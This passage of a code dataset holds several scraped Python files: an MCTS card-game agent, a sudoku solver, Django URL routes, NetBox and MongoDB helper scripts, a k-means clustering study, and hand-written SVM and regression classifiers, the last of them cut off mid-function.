self.update_node(curr_node)\n break\n\n if not curr_node.is_expanded:\n if curr_node.is_evaluated:\n self.expand_node(curr_node)\n else:\n self.evaluate_node(curr_node)\n if curr_node.is_evaluating:\n nodes_queue.append(curr_node)\n break\n\n _,curr_node = curr_node.select_action_by_value()\n # if curr_node.is_root:\n # _,curr_node = curr_node.select_action_by_value_root(dirichlet_noise_value[counts],self.explore_alpha)\n # else:\n # _,curr_node = curr_node.select_action_by_value()\n\n # try:\n # ruler = state.ruler\n # kvs = list(self.root_node.children.items())\n # values = [kv[1].sim_count for kv in kvs]\n # sort_idxs = np.argsort(values)[::-1]\n # debug_str = []\n # for idx in sort_idxs:\n # child = kvs[idx][1]\n # debug_str.append(' {},{:.0f},{:.0f},{:.0f},{:.0f}'.format(ruler.get_codes_repr(kvs[idx][0]),child.sim_count,child.sim_value,child.predict_value,child.get_select_value(np.sqrt(self.root_node.sim_count))))\n \n # debug_str = ';'.join(debug_str)\n # print(counts,debug_str)\n # except Exception:\n # pass\n \n if len(nodes_queue) > 0:\n self.predict_node_batch(nodes_queue)\n nodes_queue = []\n\n if self.infer_flag:\n temp = 0\n else:\n if state.round_ >= 10:\n temp = 0\n else:\n temp = self.temp * (1 - state.round_ / 10.0)\n\n a_idx,action,a_probs,q_values = self.root_node.select_action_by_count_aug(temp=temp)\n # _,_,a_probs,q_values = self.root_node.select_action_by_count_aug(temp=1)\n\n if self.debug_flag:\n # print(state.round_,self.root_node.child_probs)\n # print(state.round_,a_probs,temp)\n\n try:\n ruler = state.ruler\n kvs = list(self.root_node.children.items())\n values = [kv[1].sim_count for kv in kvs]\n sort_idxs = np.argsort(values)[::-1]\n debug_str = []\n for idx in sort_idxs[:5]:\n child = kvs[idx][1]\n debug_str.append(' {}-->N:{:d},V:{:.0f},{:.0f},p:{:.2f},{:.2f}'.format(ruler.get_codes_repr(kvs[idx][0]),child.sim_count,child.sim_value,child.predict_value,a_probs[idx],child.pc/self.c_puct))\n \n debug_str = ';'.join(debug_str)\n print(debug_str)\n except Exception:\n pass\n\n if self.sample_collect_flag:\n state_vec,actions_vec,direc = self.root_node.state.get_vecs()\n\n self.samples_partial_cache.append((state_vec,actions_vec,direc,state.eval_score,a_probs,q_values))\n # ## policy samples: P(state,actions,direc) -> action_probs\n # 
self.policy_samples_cache.append((state_vec,actions_vec,direc,a_probs))\n # ## value samples: Q(state,action) -> final reward - current reward\n # ## only init parts here; append the final reward at the end of the game\n # self.value_samples_partial_cache.append((state_vec,actions_vec[:,a_idx],state.eval_score))\n \n return action\n","repo_name":"hanqiu92/shengji","sub_path":"public_full/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":21759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"24168503357","text":"class Solution:\n def solveSudoku(self, board: List[List[str]]) -> None:\n def backtrack(board):\n for i in range(len(board)): # 遍历行\n for j in range(len(board[0])): # 遍历列\n if board[i][j] != \".\":\n continue\n for k in range(1, 10): # (i, j) 这个位置放k是否合适\n if isValid(i, j, k, board):\n board[i][j] = str(k) # 放置k\n if backtrack(board): return True # 如果找到合适一组立刻返回\n board[i][j] = \".\" # 回溯,撤销k\n return False # 9个数都试完了,都不行,那么就返回false\n return True # 遍历完没有返回false,说明找到了合适棋盘位置了\n\n def isValid(row, col, val, board):\n for i in range(9): # 判断行里是否重复\n if board[row][i] == str(val):\n return False\n for j in range(9): # 判断列里是否重复\n if board[j][col] == str(val):\n return False\n startRow = (row // 3) * 3\n startcol = (col // 3) * 3\n for i in range(startRow, startRow + 3): # 判断9方格里是否重复\n for j in range(startcol, startcol + 3):\n if board[i][j] == str(val):\n return False\n return True\n\n backtrack(board)","repo_name":"myf-algorithm/Leetcode","sub_path":"Leetcode/37.解数独.py","file_name":"37.解数独.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"37437546788","text":"from django.conf.urls import url\r\nfrom .views import KalendarListView, DayNoUpdateView, EventCreateView, EventUpdateView, SchoolKalendarTemplateView\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\nurlpatterns = [\r\n\turl(r'^$', KalendarListView.as_view(), name='kalendar-list-view'),\r\n\turl(r'^school/$', SchoolKalendarTemplateView.as_view(), name='school_kalendar-template-view'),\r\n url(r'^(?P\\d{4})/(?P\\d{1,2})$', KalendarListView.as_view(), name='kalendar-view'),\t#if sent with month, day etc.\r\n url(r'^changeday/(?P\\d+)/$', DayNoUpdateView.as_view(), name='dayno-update-view'),\r\n url(r'^addevent/(?P\\d+)/$', EventCreateView.as_view(), name='event-create-view'),\r\n url(r'^changeevent/(?P\\d+)/$', EventUpdateView.as_view(), name='event-update-view'),\r\n ]\r\n","repo_name":"personnameds/classsite","sub_path":"kalendar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42795768547","text":"import pynetbox\nimport config\n\nnetbox = pynetbox.api(url=config.URL_NB, token=config.TOKEN_NB)\n\ndef check_manufacs(manufact_name):\n \"\"\"\n Từ thông tin manufacturers trả về thông tin id của manufacturers,\n nếu thông tin manufacturer trống, tạo manufacturer\n \"\"\"\n import create_manufacturers\n manufact_info = netbox.dcim.manufacturers.get(name=\"{}\" .format(manufact_name))\n if manufact_info == None:\n create_manufacturers.create_manufacs_main()\n manufact_info1 = netbox.dcim.manufacturers.get(name=\"{}\" .format(manufact_name))\n manufact_id = manufact_info1['id']\n else:\n manufact_id = manufact_info['id']\n return manufact_id\n\ndef check_tenants(tenant_name):\n \"\"\"\n Từ thông tin tenants trả về thông tin id của tenants,\n nếu thông tin tenants trống, tạo tenants\n \"\"\"\n from create_tenancy import create_tenants_main\n tenant_info = netbox.tenancy.tenants.get(name=\"{}\" .format(tenant_name))\n if tenant_info == None:\n create_tenants_main()\n tenant_info1 = netbox.tenancy.tenants.get(name=\"{}\" .format(tenant_name))\n tenant_id = tenant_info1['id']\n else:\n tenant_id = tenant_info['id']\n return tenant_id\n\ndef check_sites(site_name):\n \"\"\"\n Từ thông tin sites trả về thông tin id của sites,\n nếu thông tin sites trống, tạo sites\n \"\"\"\n import create_sites\n site_info = netbox.dcim.sites.get(name=\"{}\" .format(site_name))\n if site_info == None:\n create_sites.create_site_main()\n site_info1 = netbox.dcim.sites.get(name=\"{}\" .format(site_name))\n site_id = site_info1['id']\n else:\n site_id = site_info['id']\n return site_id\n\ndef check_regions(region_name):\n \"\"\"\n Từ thông tin regions trả về thông tin id của regions,\n nếu thông tin regions trống, tạo regions\n \"\"\"\n from create_regions import create_region_main\n region_info = netbox.dcim.regions.get(name=\"{}\" .format(region_name))\n if region_info == None:\n create_region_main()\n region_info1 = netbox.dcim.regions.get(name=\"{}\" .format(region_name))\n region_id = region_info1['id']\n else:\n region_id = region_info['id']\n return region_id\n\ndef check_racks(rack_name):\n \"\"\"\n Từ thông tin racks trả về thông tin id của racks,\n nếu thông tin racks trống, tạo racks\n \"\"\"\n import create_racks\n rack_info = netbox.dcim.racks.get(name=\"{}\" .format(rack_name))\n if rack_info == None:\n create_racks.create_rack_main()\n rack_info1 = netbox.dcim.racks.get(name=\"{}\" .format(rack_name))\n rack_id = rack_info1['id']\n else:\n rack_id = rack_info['id']\n return rack_id\n\ndef check_rack_roles(role_name):\n \"\"\"\n Từ thông tin Rack roles trả về thông tin id của Rack roles,\n nếu thông tin Rack roles trống, tạo Rack roles\n \"\"\"\n import create_rack_roles\n rack_role_info = netbox.dcim.rack_roles.get(name=\"{}\" .format(role_name))\n if rack_role_info == None:\n create_rack_roles.create_rack_role_main()\n rack_role_info1=netbox.dcim.rack_roles.get(name=\"{}\" .format(role_name))\n rack_role_id = rack_role_info1['id']\n else:\n rack_role_id = rack_role_info['id']\n return rack_role_id\n\ndef check_rack_group(group_name, site):\n \"\"\"\n Từ thông tin Rack group trả về thông tin id của Rack group,\n nếu thông tin Rack group trống, tạo Rack group\n \"\"\"\n from create_rack_groups import create_rack_group_main\n rack_group_info = netbox.dcim.rack_groups.get(name=\"{}\" .format(group_name), site_id= site)\n if rack_group_info == None:\n create_rack_group_main()\n rack_group_info1 = netbox.dcim.rack_groups.get(name=\"{}\" .format(group_name), site_id= 
site)\n rack_group_id = rack_group_info1['id']\n else:\n rack_group_id = rack_group_info['id']\n return rack_group_id\n\ndef check_device_types(manufact_id, device_model):\n \"\"\"\n Từ thông tin Device type trả về thông tin id của Device type,\n nếu thông tin Device type trống, tạo Device type\n \"\"\"\n import create_device_types\n import create_interface_tpl\n device_type_info = netbox.dcim.device_types.get(manufacturer_id='{}' .format(manufact_id), model='{}' .format(device_model))\n if device_type_info == None:\n create_device_types.create_device_type_main()\n create_interface_tpl.create_inf_template_main()\n device_type_info1 = netbox.dcim.device_types.get(manufacturer_id='{}' .format(manufact_id), model='{}' .format(device_model))\n device_type_id = device_type_info1['id']\n else:\n device_type_id = device_type_info['id']\n return device_type_id\n\ndef check_device_roles(role_name):\n \"\"\"\n Từ thông tin Device role trả về thông tin id của Device role,\n nếu thông tin Device role trống, tạo Device role\n \"\"\"\n import create_device_roles\n device_role_info = netbox.dcim.device_roles.get(name=\"{}\" .format(role_name))\n if device_role_info == None:\n create_device_roles.create_device_role_main()\n device_role_info1 = netbox.dcim.device_roles.get(name=\"{}\" .format(role_name))\n device_role_id = device_role_info1['id']\n else:\n device_role_id = device_role_info['id']\n return device_role_id\n\ndef check_platforms(name):\n \"\"\"\n Từ thông tin platforms trả về thông tin id của platforms,\n nếu thông tin platforms trống, tạo platforms\n \"\"\"\n import create_platforms\n platform_info = netbox.dcim.platforms.get(name=\"{}\" .format(name))\n if platform_info == None:\n create_platforms.create_platforms_main()\n platform_info1 = netbox.dcim.platforms.get(name=\"{}\" .format(name))\n platform_id = platform_info1['id']\n else:\n platform_id = platform_info['id']\n return platform_id\n\ndef check_position_racks(rack_id):\n \"\"\"\n Kiểm tra vị trí còn trống trên tủ rack\n \"\"\"\n device_used = []\n check_device_in_racks = netbox.dcim.devices.filter(rack_id='{}' .format(rack_id))\n for device in check_device_in_racks:\n # Lấy ra các device đang đặt trên rack và lưu vào device_used\n if device not in device_used:\n device_used.append(device)\n position_used = []\n for deivce_name in device_used:\n # Lấy ra các vị trí u đã sử dụng và lưu vào position_used\n device_info = netbox.dcim.devices.get(name='{}' .format(deivce_name))\n position = device_info['position']\n manufact_id = device_info['device_type']['manufacturer']['id']\n device_model = device_info['device_type']['model']\n device_type_info = netbox.dcim.device_types.get(manufacturer_id='{}' .format(manufact_id), model='{}' .format(device_model))\n u_height = device_type_info['u_height']\n if ((position not in position_used) and ((position+u_height-1) not in position_used)): \n position_used.extend(range (position, position+u_height))\n else:\n print(\"Vị Trí {} Đã Có Thiết Bị Được Đặt\" .format(position))\n return position_used\n\ndef check_vlan_group(vgroup_name):\n \"\"\"\n Từ thông tin vlan group trả về thông tin id của vlan group,\n nếu thông tin vlan group trống, tạo vlan group\n \"\"\"\n import create_vlan_groups\n vlan_group_info = netbox.ipam.vlan_groups.get(name=\"{}\" .format(vgroup_name))\n if vlan_group_info == None:\n create_vlan_groups.create_vlan_group_main()\n vlan_group_info1 = netbox.ipam.vlan_groups.get(name=\"{}\" .format(vgroup_name))\n vlan_group_id = vlan_group_info1['id']\n else:\n vlan_group_id = 
vlan_group_info['id']\n return vlan_group_id\n\ndef check_vlan(vlan_name, site_id):\n \"\"\"\n Từ thông tin vlan trả về thông tin id của vlan,\n nếu thông tin vlantrống, tạo vlan\n \"\"\"\n import create_vlans\n vlan_info = netbox.ipam.vlans.get(name=\"{}\" .format(vlan_name), site_id = \"{}\" .format(site_id))\n if vlan_info == None:\n create_vlans.create_vlan_main()\n vlan_info1 = netbox.ipam.vlans.get(name=\"{}\" .format(vlan_name), site_id = \"{}\" .format(site_id))\n vlan_id = vlan_info1['id']\n else:\n vlan_id = vlan_info['id']\n return vlan_id\n\ndef check_rir(rir_name):\n \"\"\"\n Từ thông tin rir trả về thông tin id của rir,\n nếu thông tin rir trống, tạo rir\n \"\"\"\n import create_rirs\n rir_info = netbox.ipam.rirs.get(name=\"{}\" .format(rir_name))\n if rir_info == None:\n create_rirs.create_rir_main()\n rir_info1 = netbox.ipam.rirs.get(name=\"{}\" .format(rir_name))\n rir_id = rir_info1['id']\n else:\n rir_id = rir_info['id']\n return rir_id\n\ndef check_prefix_role(role_name):\n \"\"\"\n Từ thông tin prefix role trả về thông tin id của prefix role,\n nếu thông tin prefix role trống, tạo prefix role\n \"\"\"\n import create_prefixe_roles\n prefix_role_info = netbox.ipam.roles.get(name=\"{}\" .format(role_name))\n if prefix_role_info == None:\n create_prefixe_roles.create_prefix_role_main()\n prefix_role_info1 = netbox.ipam.roles.get(name=\"{}\" .format(role_name))\n role_id = prefix_role_info1['id']\n else:\n role_id = prefix_role_info['id']\n return role_id\n\ndef check_interface(device_name, inf_name):\n \"\"\"\n Từ thông tin interface trên device trả về thông tin id của interface\n \"\"\"\n try:\n interface_info = netbox.dcim.interfaces.get(device='{}' .format(device_name), name='{}' .format(inf_name))\n interface_id = interface_info['id']\n return interface_id\n except Exception as ex:\n print(ex)","repo_name":"VNPT-SmartCloud-System/Tim-hieu-Netbox","sub_path":"netbox_create_data/core/check_data_netbox.py","file_name":"check_data_netbox.py","file_ext":"py","file_size_in_byte":9822,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"11054804202","text":"from datetime import datetime\nimport bson.json_util\nfrom bson.json_util import dumps, loads\nimport json\nfrom dbconfig import users, tasks\n\nUSER_SCHEMA = {\n \"_id\": \"60756d56c44fb6fd55337f82\",\n \"user_id\": 1,\n \"name\": \"jondoe\",\n\n}\nSTATUS = [\"Pending\", \"InProgress\", \"InReview\", \"Completed\"]\n\nTASKS_SCHEMA = {\n \"title\": \"this is a task title\",\n \"description\": \"this is a task description\",\n \"current_status\": STATUS[0],\n \"ETA\": \"send-date-time of completion\",\n \"Assignee\": \"someone\",\n \"PENDING\": \"datetime.now()\",\n \"INPROGRESS\": \"datetime.now()\",\n \"INREVIEW\": \"datetime.now()\",\n \"COMPLETED\": \"datetime.now()\",\n}\n\nUPDATE_TASK_STATUS_SCHEMA = {\n \"title\": \"this is a task title\",\n \"description\": \"this is a task description\",\n \"ETA\": \"sometime\",\n \"current_status\": STATUS[2],\n \"timestamp\": datetime.now(),\n}\nUPDATE_TASK_SCHEMA = {\n \"title\": \"this is a task title\",\n \"description\": \"this is a task description\",\n \"Assignee\":\"haha\",\n \"ETA\": datetime.now(),\n \"timestamp\": datetime.now(),\n}\n\n\ndef add_task(task):\n query = {\"title\": task['title']}\n if tasks.count_documents(query) == 1:\n return None\n x = tasks.insert_one(task)\n x = tasks.update_one(query, {\n \"$set\": {\"current_status\": task[\"current_status\"], \"PENDING\": datetime.now()}})\n return task\n\n\n# print(add_task(TASKS_SCHEMA))\n\ndef show_task():\n task = tasks.find({})\n list_task = list(task)\n json_data = dumps(list_task)\n # print(task)\n new_dict = []\n for x in tasks.find({}):\n new_dict.append(x)\n # print(x)\n\n # print(new_dict)\n new_dict = json.loads(bson.json_util.dumps(new_dict))\n return new_dict\n\n\n# print(show_task())\n\n\ndef update_task_status(task):\n query = {\"title\": task[\"title\"]}\n if tasks.count_documents(query) == 1:\n x = tasks.update_one(query, {\n \"$set\": {\"current_status\": task[\"current_status\"], task[\"current_status\"]: datetime.now()}})\n return task\n\n\ndef update_task(task):\n query = {\"title\": task[\"title\"]}\n if tasks.count_documents(query) == 1:\n x = tasks.update_one(query, {\n \"$set\": {\"ETA\": task[\"ETA\"], \"Assignee\": task[\"Assignee\"]}})\n return task\n\n\n# print(update_task(UPDATE_TASK_SCHEMA))\n","repo_name":"chirayupatel9/SEFS","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73698282141","text":"\"\"\"\r\nCreated on 2023/09/11\r\n@author: huguet\r\n\"\"\"\r\nimport os\r\nos.environ[\"OMP_NUM_THREADS\"] = '4'\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\nfrom scipy.io import arff\r\nfrom sklearn import cluster\r\nfrom sklearn import metrics\r\n\r\n# Chargement des données\r\npath = './artificial/'\r\nname = \"2d-4c.arff\"\r\ndatabrut = arff.loadarff(open(path + str(name), 'r'))\r\ndatanp = np.array([[x[0], x[1]] for x in databrut[0]])\r\n\r\n# Affichage des données initiales en 2D\r\nprint(\"---------------------------------------\")\r\nprint(\"Affichage données initiales \" + str(name))\r\nf0 = datanp[:, 0]\r\nf1 = datanp[:, 1]\r\nplt.scatter(f0, f1, s=8)\r\nplt.title(\"Donnees initiales : \" + str(name))\r\nplt.show()\r\n\r\n# Application de KMeans pour une valeur de k fixée\r\nprint(\"------------------------------------------------------\")\r\nprint(\"Appel KMeans pour une valeur de k fixée\")\r\ntps1 = time.time()\r\nk = 4\r\nmodel = cluster.KMeans(n_clusters=k, init='k-means++', n_init=1)\r\nmodel.fit(datanp)\r\ntps2 = time.time()\r\nlabels = model.labels_\r\niteration = model.n_iter_\r\ninertie = model.inertia_\r\ncentroids = model.cluster_centers_\r\n\r\n# Affichage des données après clustering\r\nplt.scatter(f0, f1, c=labels, s=8)\r\nplt.scatter(centroids[:, 0], centroids[:, 1], marker=\"x\", s=50, linewidths=3, color=\"red\")\r\nplt.title(\"Données après clustering : \" + str(name) + \" - Nb clusters =\" + str(k))\r\nplt.show()\r\n\r\n# Affichage des informations sur le clustering\r\nprint(\"nb clusters =\", k, \", nb iter =\", iteration, \", inertie = \", inertie, \", runtime = \", round((tps2 - tps1) * 1000, 2), \"ms\")\r\n\r\n# Calcul des distances entre les centroids\r\ndists = metrics.pairwise.euclidean_distances(centroids)\r\nmin_distances = dists.min(axis=1)\r\nmax_distances = dists.max(axis=1)\r\nmean_distances = dists.mean(axis=1)\r\n\r\n# Calcul des distances de chaque point aux centroids\r\npoint_to_centroid_dists = metrics.pairwise.euclidean_distances(datanp, centroids)\r\n\r\n# Affichage des distances pour chaque cluster\r\nfor i in range(k):\r\n cluster_point_dists = point_to_centroid_dists[labels == i, i]\r\n print(f\"Cluster {i + 1} - Min distance: {cluster_point_dists.min():.2f}, Max distance: {cluster_point_dists.max():.2f}, Mean distance: {cluster_point_dists.mean():.2f}\")\r\n\r\n# Calcul des scores de séparation entre clusters\r\ncentroid_distances = metrics.pairwise.pairwise_distances(centroids)\r\nlower_triangle = np.tril(centroid_distances, -1)\r\nnon_zero_values = lower_triangle[lower_triangle > 0]\r\nprint(f\"Separation between clusters - Min distance: {non_zero_values.min():.2f}, Max distance: {non_zero_values.max():.2f}, Mean distance: {non_zero_values.mean():.2f}\")\r\n\r\n# Calcul et affichage de l'évolution de l'inertie en fonction du nombre de clusters\r\ninertia_values = []\r\nfor k in range(1, 11):\r\n model = cluster.KMeans(n_clusters=k, init='k-means++')\r\n model.fit(datanp)\r\n inertia_values.append(model.inertia_)\r\n\r\nplt.figure()\r\nplt.plot(range(1, 11), inertia_values, marker='o')\r\nplt.title('Evolution de l\\'inertie')\r\nplt.xlabel('Nombre de clusters')\r\nplt.ylabel('Inertie')\r\nplt.show()\r\n\r\n# Évaluation de la qualité du clustering pour différents nombres de clusters\r\nk_values = range(2, 11)\r\nsilhouette_scores = []\r\ndavies_bouldin_scores = []\r\ncalinski_harabasz_scores = []\r\n\r\n# Calcul des métriques pour chaque nombre de clusters\r\nfor k 
in k_values:\r\n model = cluster.KMeans(n_clusters=k, init='k-means++')\r\n labels = model.fit_predict(datanp)\r\n silhouette_scores.append(metrics.silhouette_score(datanp, labels))\r\n davies_bouldin_scores.append(metrics.davies_bouldin_score(datanp, labels))\r\n calinski_harabasz_scores.append(metrics.calinski_harabasz_score(datanp, labels))\r\n\r\n# Affichage des métriques\r\nplt.figure(figsize=(10, 8))\r\nplt.subplot(3, 1, 1)\r\nplt.plot(k_values, silhouette_scores, marker='o', label='Coefficient de Silhouette', color='red')\r\nplt.legend()\r\nplt.title('Évaluation de la qualité du clustering en fonction de k')\r\nplt.ylabel('Coefficient de Silhouette')\r\n\r\nplt.subplot(3, 1, 2)\r\nplt.plot(k_values, davies_bouldin_scores, marker='x', label='Indice de Davies-Bouldin', color='green')\r\nplt.legend()\r\nplt.ylabel('Indice de Davies-Bouldin')\r\n\r\nplt.subplot(3, 1, 3)\r\nplt.plot(k_values, calinski_harabasz_scores, marker='s', label='Indice de Calinski-Harabasz')\r\nplt.legend()\r\nplt.xlabel('Nombre de clusters')\r\nplt.ylabel('Indice de Calinski-Harabasz')\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Application de MiniBatchKMeans pour différentes configurations\r\nfrom sklearn.cluster import MiniBatchKMeans\r\n\r\nbatch_sizes = [10, 50, 100, 500]\r\nn_clusters_list = [2, 3, 4, 5]\r\nn_init = 10\r\n\r\nfor n_clusters in n_clusters_list:\r\n for batch_size in batch_sizes:\r\n model = MiniBatchKMeans(n_clusters=n_clusters, batch_size=batch_size, n_init=n_init, init='k-means++')\r\n model.fit(datanp)\r\n labels = model.labels_\r\n centroids = model.cluster_centers_\r\n silhouette = metrics.silhouette_score(datanp, labels)\r\n davies_bouldin = metrics.davies_bouldin_score(datanp, labels)\r\n calinski_harabasz = metrics.calinski_harabasz_score(datanp, labels)\r\n print(f\"Configuration: n_clusters = {n_clusters}, batch_size = {batch_size}\")\r\n print(f\"Silhouette Score: {silhouette:.3f}\")\r\n print(f\"Davies Bouldin Score: {davies_bouldin:.3f}\")\r\n print(f\"Calinski Harabasz Score: {calinski_harabasz:.3f}\")\r\n print(\"-----------------------------------\")\r\n plt.scatter(datanp[:, 0], datanp[:, 1], c=labels, s=8)\r\n plt.scatter(centroids[:, 0], centroids[:, 1], marker=\"x\", s=50, linewidths=3, color=\"red\")\r\n plt.title(f\"Données après clustering avec MiniBatchKMeans (n_clusters={n_clusters}, batch_size={batch_size})\")\r\n plt.show()\r\n","repo_name":"Sofiene29/ANS","sub_path":"2-Starting-with-k-means.py","file_name":"2-Starting-with-k-means.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7017407532","text":"import numpy as np\nimport cvxopt\nfrom tqdm import tqdm\nimport scipy\nfrom scipy.spatial.distance import pdist, squareform, cdist\nfrom scipy.special import expit\n\nclass LogisticRegression():\n\n    def __init__(self):\n        self.weights = None\n\n    def sigmoid(self, z):\n        return 1 / (1 + np.exp(-z))\n\n    def predict_probas(self, X):\n        z = X @ self.weights\n        return self.sigmoid(z)\n\n    def cross_entropy(self, X, y):\n        n = X.shape[0]\n        # fixed: predict_probas takes only X (the weights are an attribute)\n        y_pred = self.predict_probas(X)\n        cost = y * np.log(y_pred) + (1 - y) * np.log(1 - y_pred)\n        # fixed: negate the mean log-likelihood to get the cross-entropy\n        return -cost.sum() / n\n\n    def get_grad(self, X, y):\n        n = X.shape[0]\n        y_pred = self.predict_probas(X=X)\n\n        return X.T @ (y_pred - y) / n\n\n    def fit(self, X, y, max_iter=1000, lr=1, eps=1e-6):\n        self.weights = np.zeros(X.shape[1])\n        cv = False\n        j = 1\n        for i in range(max_iter):\n            weights_prev = self.weights.copy()\n            grad = self.get_grad(X, y)\n            self.weights -= lr * grad\n            if np.linalg.norm(self.weights - weights_prev, 2) < eps:\n                cv = True\n                print('Algorithm converged !')\n                break\n            if (i/10000 == j):\n                lr /= 2\n                j += 1\n        if not(cv):\n            print('Reached maximum iterations without convergence.')\n\n    def predict(self, X):\n        probas = self.predict_probas(X=X)\n        return (probas>0.5).astype(int)\n\n    def get_accuracy_score(self, X, y):\n        pred_labels = self.predict(X=X)\n        return (pred_labels==y).mean()\n\n\nclass SVM_custom_kernel:\n\n    def __init__(self, c=1, eps=1e-4):\n        self.alpha_ = None\n        self.c = c\n        self.eps = eps\n\n    def fit(self, kernel_train, labels):\n        n = len(labels)\n\n        # prepare matrices of dual problem for solving\n        diag = np.zeros((n, n))\n        np.fill_diagonal(diag, labels)\n\n        P = diag @ kernel_train @ diag\n        P = cvxopt.matrix(P)\n\n        Q = cvxopt.matrix(np.ones(n) * -1)\n\n        if self.c is None:\n            G = cvxopt.matrix(np.diag(np.ones(n) * -1))\n            h = cvxopt.matrix(np.zeros(n))\n        else:\n            G = cvxopt.matrix(np.vstack((np.diag(np.ones(n) * -1), np.identity(n))))\n            h = cvxopt.matrix(np.hstack((np.zeros(n), np.ones(n) * self.c)))\n\n        A = labels.T\n        A = A.astype('double')\n        A = cvxopt.matrix(A)\n        b = cvxopt.matrix(0.0)\n\n        # Solve QP problem using cvxopt\n        u = cvxopt.solvers.qp(P, Q, G, h, A, b)\n\n        # take Lagrange multipliers,\n        alpha = np.ravel(u['x'])\n\n        # Identify support vectors\n        sv = alpha > self.eps\n        ind = np.arange(len(alpha))[sv]\n\n        self.alpha_ = alpha[sv]\n        self.sv = np.argwhere(sv == True)\n        self.sv_label = labels[sv]\n\n        # Compute bias value\n        self.b = 0.0\n        for i in range(len(self.alpha_)):\n            self.b += self.sv_label[i]\n            self.b -= np.sum(self.alpha_ * self.sv_label[:, 0] * kernel_train[sv, ind[i]])\n        self.b /= len(self.alpha_)\n\n    def predict(self, kernel_test):\n\n        y_predict = np.zeros(kernel_test.shape[1])\n\n        for i in range(kernel_test.shape[1]):\n            y_predict[i] = sum(alpha * sv_label * kernel_test[sv, i] for alpha, sv, sv_label in\n                               zip(self.alpha_, self.sv, self.sv_label[:, 0]))\n        # fixed: removed the unreachable np.sign lines that followed this return;\n        # predict_class() thresholds the returned decision values instead\n        return y_predict + self.b\n\n    def predict_class(self, kernel_test):\n\n        prediction = np.array(self.predict(kernel_test) >= 0, dtype=int)\n        prediction[prediction == 0] = -1\n        return prediction\n\n\nclass SVMClassifier():\n\n    def __init__(self, C=1, kernel='rbf', gamma=0.1):\n        self.C = C\n        self.kernel = kernel\n        if self.kernel == 'rbf':\n            self.f_kernel = self.GRBF_kernel\n        self.gamma = gamma\n\n    def GRBF_kernel(self, x1, x2, gamma):\n        return np.exp(-np.linalg.norm(x1 - x2) * gamma)\n\n    # the computation of Gram matrix will be much faster using this\n\n    def get_kernel_gram_matrix(self, X, gamma):\n\n        if self.kernel in ['gaussian', 'rbf']:\n            # Faster computation of the gram matrix with gaussian kernel\n            # st= time.time()\n            pairwise_dists = squareform(pdist(X, 'sqeuclidean'))\n            K = np.exp(-pairwise_dists * gamma)\n            # print(time.time()-st)\n            return K\n\n    def fit(self, X, y, transform_y=True):\n        y = y.copy()\n        if transform_y:\n            y = y * 2 - 1\n\n        n, m = X.shape\n\n        # the computation of Gram matrix will be much faster using this\n        K = self.get_kernel_gram_matrix(X, self.gamma)\n\n        '''K1 = np.zeros((n,n))\n        for i in tqdm(range(n)):\n            for j in range(n):\n                K1[i, j] = self.f_kernel(X[i], X[j], gamma=self.gamma)'''\n\n\n        # construct for solver\n        P = cvxopt.matrix(np.outer(y, y) * K)\n        q = cvxopt.matrix(np.ones(n) * -1)\n        # fixed: cast to double, cvxopt's qp requires 'd' matrices\n        A = cvxopt.matrix(y.astype('double'), (1, n))\n        b = cvxopt.matrix(0.0)\n        if self.C is None:\n            G = cvxopt.matrix(np.diag(np.ones(n) * -1))\n            h = cvxopt.matrix(np.zeros(n))\n        else:\n            G = cvxopt.matrix(np.vstack((np.diag(np.ones(n) * -1), np.identity(n))))\n            h = cvxopt.matrix(np.hstack((np.zeros(n), np.ones(n) * self.C)))\n        # solve QP problem\n        solution = cvxopt.solvers.qp(P, q, G, h, A, b)\n        # Lagrange multipliers\n        LagM = np.ravel(solution['x'])\n        # Get support vectors\n        self.SuppVec_indices = LagM > 1e-5\n        self.supportVectors = X[self.SuppVec_indices]\n        self.supportY = y[self.SuppVec_indices] * LagM[self.SuppVec_indices]\n\n    def predict_probas(self, X):\n\n        try:\n            assert self.kernel in ['gaussian', 'rbf']\n            # compute pairwise (squared euclidean) distances between new samples and support vectors\n            pairwise_dists = cdist(self.supportVectors, X, 'sqeuclidean')\n            # gaussian kernel evaluations\n            K_pred = np.exp(-pairwise_dists * self.gamma)\n            \n            #fixed error: due to self.weight instead of self.supportY\n            pred_probas = expit(K_pred.T @ self.supportY)\n            return pred_probas\n\n        except:\n            print('Please make sure the used kernel is gaussian.')\n\n    def predict(self, X):\n        probas = self.predict_probas(X=X)\n        return (probas > 0.5).astype(int)\n\n    def get_accuracy_score(self, X, y):\n        pred_labels = self.predict(X=X)\n        return (pred_labels == y).mean()\n\n\nclass WKRR():\n    \"\"\"\n    Weighted Kernel Ridge Regression\n\n    \"\"\"\n\n    def __init__(self, kernel='gaussian', sigma=1):\n        self.weights = None\n        self.kernel = kernel\n        # fixed: store the bandwidth, fit() reads self.sigma when the kernel is not precomputed\n        self.sigma = sigma\n        # kernel gram matrix over training data\n        self.K_train = None\n        # training samples\n        self.X_train = None\n\n    def get_kernel_gram_matrix(self, X, sigma):\n\n        if self.kernel == 'gaussian':\n            # Faster computation of the gram matrix with gaussian kernel\n            # st= time.time()\n            pairwise_dists = squareform(pdist(X, 'sqeuclidean'))\n            K = np.exp(-pairwise_dists / (2 * np.square(sigma)))\n            # print(time.time()-st)\n            return K\n\n    def fit(self, X, y, penalty, W=None, eps=1e-6, kernel_precomputed=False):\n        \"\"\"\n        Returns analytical solution of the Weighted Kernel Ridge Regression problem\n        \"\"\"\n\n        self.X_train = X\n        if kernel_precomputed:\n            K = self.K_train\n        else:\n            K = 